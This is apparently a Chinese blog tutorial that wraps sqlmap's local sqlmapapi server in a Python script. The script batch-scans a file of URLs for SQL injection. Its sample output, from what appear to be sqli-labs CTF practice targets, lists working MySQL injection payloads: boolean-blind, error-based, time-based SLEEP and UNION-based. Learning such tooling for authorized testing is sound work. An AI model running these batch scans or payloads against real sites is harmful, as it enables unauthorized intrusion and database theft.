python实现sqlmapapi调用实现批量

Posted Rgylin


环境

sqlmap 自带的 sqlmapapi 提供 HTTP 接口，可以由 python 调用

首先在 cmd 中输入以下命令启动 sqlmapapi 服务端(默认只监听本机的 127.0.0.1:8775，接口默认不带认证，不要把它绑定到外部地址)：

python sqlmapapi.py -s

然后用 python 连接它并创建任务

import  requests

# Create a new task on the local sqlmapapi server. The reply is JSON
# carrying a "success" flag and the new "taskid".
url = 'http://127.0.0.1:8775/task/new'
res1 = requests.get(url)
reply_text = res1.content.decode('utf-8')
print(reply_text)

为该任务 Id 设置扫描参数(目标 url)

# Push the scan options for task `taskId` as a JSON body. `data` holds the
# options (at least 'url') and `header` sets Content-Type: application/json.
set_url = 'http://127.0.0.1:8775/option/' + taskId + '/set'
payload = json.dumps(data)
res_set_url = requests.post(set_url, data=payload, headers=header)

启动对应 Id 的扫描任务

# Start the scan for task `taskId`; same JSON body and headers as the
# option call. Uncomment the print to see the raw reply.
start_url = 'http://127.0.0.1:8775/scan/' + taskId + '/start'
payload = json.dumps(data)
res_start_url = requests.post(start_url, data=payload, headers=header)
# print(res_start_url.content.decode('utf-8'))

读取扫描状态，判断扫描是否已经结束

# Poll the task status; the reply text contains "running" while the scan
# is still in progress. Uncomment the print to see the raw reply.
status_url = 'http://127.0.0.1:8775/scan/' + taskId + '/status'
res_status = requests.get(status_url)
# print(res_status.content.decode('utf-8'))

读取扫描结果数据

# Fetch the finished scan's result (JSON text) for task `taskId`.
task_data_url = 'http://127.0.0.1:8775/scan/' + taskId + '/data'
task_data_res = requests.get(task_data_url)
result_text = task_data_res.content.decode('utf-8')
print(result_text)

综合以上步骤的完整脚本

import requests
import json
import time
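def sqlapi(url, api_base='http://127.0.0.1:8775', poll_interval=3):
    """Scan one target URL through a running sqlmapapi server and append the result to ``f``.

    The call sequence mirrors the step-by-step snippets above:
    ``/task/new`` -> ``/option/<id>/set`` -> ``/scan/<id>/start`` ->
    ``/scan/<id>/status`` (polled) -> ``/scan/<id>/data``.
    Each reply is checked on its JSON ``success`` field, not by searching
    the body for the word "success": a failure reply such as
    ``{"success": false, ...}`` contains that word too, so a substring test
    can never detect a failed step.

    Args:
        url: target URL. Surrounding whitespace is stripped, because lines
            read with ``readlines()`` still carry their trailing newline.
        api_base: address of the sqlmapapi server. The script sends no
            credentials, so it relies on the server being reachable only on
            the local machine (the default 127.0.0.1:8775).
        poll_interval: seconds to wait between two status polls.

    Returns:
        None. Progress is printed. The raw JSON text of ``/scan/<id>/data``
        is appended to the module-level file ``f`` opened in ``__main__``,
        followed by a newline so that consecutive results stay parseable.
        On a failed step the server message is printed and nothing is
        written.
    """
    target = url.strip()
    if not target:
        print('empty url, skipped')
        return
    header = {'Content-Type': 'application/json'}
    data = {'url': target}

    # 1. create a task
    res = requests.get(api_base + '/task/new')
    reply = res.json()
    if not reply.get('success'):
        print('sqlmapapi create failed: ' + str(reply.get('message')))
        return
    taskId = reply['taskid']
    print('sqlmapapi create success')

    # 2. push the scan options (only the target url here)
    task_set_url = api_base + '/option/' + taskId + '/set'
    task_set_res = requests.post(task_set_url, data=json.dumps(data), headers=header)
    reply = task_set_res.json()
    if not reply.get('success'):
        print('setting failed: ' + str(reply.get('message')))
        return
    print('setting success')

    # 3. start the scan
    task_start_url = api_base + '/scan/' + taskId + '/start'
    task_start_res = requests.post(task_start_url, data=json.dumps(data), headers=header)
    reply = task_start_res.json()
    if not reply.get('success'):
        print('scan start failed: ' + str(reply.get('message')))
        return
    print('scan start success')

    # 4. wait for the scan to finish. The sleep must sit inside the loop;
    #    sleeping only after the loop polls the API in a tight loop while
    #    the scan runs. The status is compared exactly: a substring test for
    #    "running" would also match a status such as "not running".
    task_status_url = api_base + '/scan/' + taskId + '/status'
    while requests.get(task_status_url).json().get('status') == 'running':
        print('sqlmap are running  ')
        time.sleep(poll_interval)

    # 5. fetch and persist the result, one JSON document per line
    task_data_url = api_base + '/scan/' + taskId + '/data'
    task_data_res = requests.get(task_data_url)
    f.write(task_data_res.content.decode('utf-8') + '\n')
    f.flush()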




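if __name__ == '__main__':
    # `f` is deliberately a module-level name: sqlapi() appends each scan
    # result to it. The with-statement closes both files even when a scan
    # raises, which the bare open() calls did not guarantee.
    with open('C:/Users/ASUS/Desktop/res.txt', 'a+') as f, open('url.txt', 'r') as targets:
        for i in targets:
            i = i.strip()  # drop the trailing newline; skip blank lines
            if not i:
                continue
            print(i)
            sqlapi(i)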
        


   
        


运行效果(res.txt 中的内容，两次扫描的结果被直接拼接在一起)为

{
    "success": true,
    "data": [
        {
            "status": 1,
            "type": 0,
            "value": {
                "url": "http://172a4874-82ae-4ab9-b49c-39289835c0df.node4.buuoj.cn:80/Less-1/",
                "query": "id=1",
                "data": null
            }
        },
        {
            "status": 1,
            "type": 1,
            "value": [
                {
                    "place": "GET",
                    "parameter": "id",
                    "ptype": 2,
                    "prefix": "'",
                    "suffix": " AND '[RANDSTR]'='[RANDSTR]",
                    "clause": [
                        1,
                        8,
                        9
                    ],
                    "notes": [],
                    "data": {
                        "1": {
                            "title": "AND boolean-based blind - WHERE or HAVING clause",
                            "payload": "id=1' AND 8661=8661 AND 'sHbo'='sHbo",
                            "where": 1,
                            "vector": "AND [INFERENCE]",
                            "comment": "",
                            "templatePayload": null,
                            "matchRatio": 0.955,
                            "trueCode": 200,
                            "falseCode": 200
                        },
                        "2": {
                            "title": "mysql >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)",
                            "payload": "id=1' AND (SELECT 8903 FROM(SELECT COUNT(*),CONCAT(0x716b707871,(SELECT (ELT(8903=8903,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'vTDo'='vTDo",
                            "where": 1,
                            "vector": "AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)",
                            "comment": "",
                            "templatePayload": null,
                            "matchRatio": 0.955,
                            "trueCode": null,
                            "falseCode": null
                        },
                        "5": {
                            "title": "MySQL >= 5.0.12 AND time-based blind (query SLEEP)",
                            "payload": "id=1' AND (SELECT 1923 FROM (SELECT(SLEEP([SLEEPTIME])))BiUc) AND 'Tryd'='Tryd",
                            "where": 1,
                            "vector": "AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])",
                            "comment": "",
                            "templatePayload": null,
                            "matchRatio": 0.955,
                            "trueCode": 200,
                            "falseCode": null
                        },
                        "6": {
                            "title": "Generic UNION query (NULL) - 1 to 20 columns",
                            "payload": "id=-3722' UNION ALL SELECT NULL,NULL,CONCAT(0x716b707871,0x7352646f5a70544c714d52424c656f6d534b5570614f50776b7244486c5a4d45684e6a6a4f575441,0x716a7a7171)-- -",
                            "where": 2,
                            "vector": [
                                2,
                                3,
                                "[GENERIC_SQL_COMMENT]",
                                "'",
                                " AND '[RANDSTR]'='[RANDSTR]",
                                "NULL",
                                2,
                                false,
                                null,
                                null,
                                null
                            ],
                            "comment": "[GENERIC_SQL_COMMENT]",
                            "templatePayload": null,
                            "matchRatio": 0.955,
                            "trueCode": null,
                            "falseCode": null
                        }
                    },
                    "conf": {
                        "textOnly": null,
                        "titles": null,
                        "code": null,
                        "string": "Your",
                        "notString": null,
                        "regexp": null,
                        "optimize": null
                    },
                    "dbms": "MySQL",
                    "dbms_version": [
                        ">= 5.0"
                    ],
                    "os": null
                }
            ]
        }
    ],
    "error": []
}{
    "success": true,
    "data": [
        {
            "status": 1,
            "type": 0,
            "value": {
                "url": "http://172a4874-82ae-4ab9-b49c-39289835c0df.node4.buuoj.cn:80/Less-2/",
                "query": "id=2",
                "data": null
            }
        },
        {
            "status": 1,
            "type": 1,
            "value": [
                {
                    "place": "GET",
                    "parameter": "id",
                    "ptype": 1,
                    "prefix": "",
                    "suffix": "",
                    "clause": [
                        1,
                        8,
                        9
                    ],
                    "notes": [],
                    "data": {
                        "1": {
                            "title": "AND boolean-based blind - WHERE or HAVING clause",
                            "payload": "id=2 AND 8114=8114",
                            "where": 1,
                            "vector": "AND [INFERENCE]",
                            "comment": "",
                            "templatePayload": null,
                            "matchRatio": 0.948,
                            "trueCode": 200,
                            "falseCode": 200
                        },
                        "2": {
                            "title": "MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)",
                            "payload": "id=2 AND (SELECT 6380 FROM(SELECT COUNT(*),CONCAT(0x71626b7671,(SELECT (ELT(6380=6380,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)",
                            "where": 1,
                            "vector": "AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)",
                            "comment": "",
                            "templatePayload": null,
                            "matchRatio": 0.948,
                            "trueCode": null,
                            "falseCode": null
                        },
                        "5": {
                            "title": "MySQL >= 5.0.12 AND time-based blind (query SLEEP)",
                            "payload": "id=2 AND (SELECT 9669 FROM (SELECT(SLEEP([SLEEPTIME])))Seva)",
                            "where": 1,
                            "vector": "AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])",
                            "comment": "",
                            "templatePayload": null,
                            "matchRatio": 0.948,
                            "trueCode": 200,
                            "falseCode": null
                        },
                        "6": {
                            "title": "Generic UNION query (NULL) - 1 to 20 columns",
                            "payload": "id=-3623 UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7671,0x4948684a5a6170425875694658705767516e704a77666a415346726754454e6c5376414a70546158,0x716b716b71)-- -",
                            "where": 2,
                            "vector": [
                                2,
                                3,
                                "[GENERIC_SQL_COMMENT]",
                                "",
                                "",
                                "NULL",
                                2,
                                false,
                                null,
                                null,
                                null
                            ],
                            "comment": "[GENERIC_SQL_COMMENT]",
                            "templatePayload": null,
                            "matchRatio": 0.948,
                            "trueCode": null,
                            "falseCode": null
                        }
                    },
                    "conf": {
                        "textOnly": null,
                        "titles": null,
                        "code": null,
                        "string": "Your",
                        "notString": null,
                        "regexp": null,
                        "optimize": null
                    },
                    "dbms": "MySQL",
                    "dbms_version": [
                        ">= 5.0"
                    ],
                    "os": null
                }
            ]
        },
        {
            "status": 1,
            "type": 2,
            "value": "back-end DBMS: MySQL >= 5.0 (MariaDB fork)"
        }
    ],
    "error": []
}
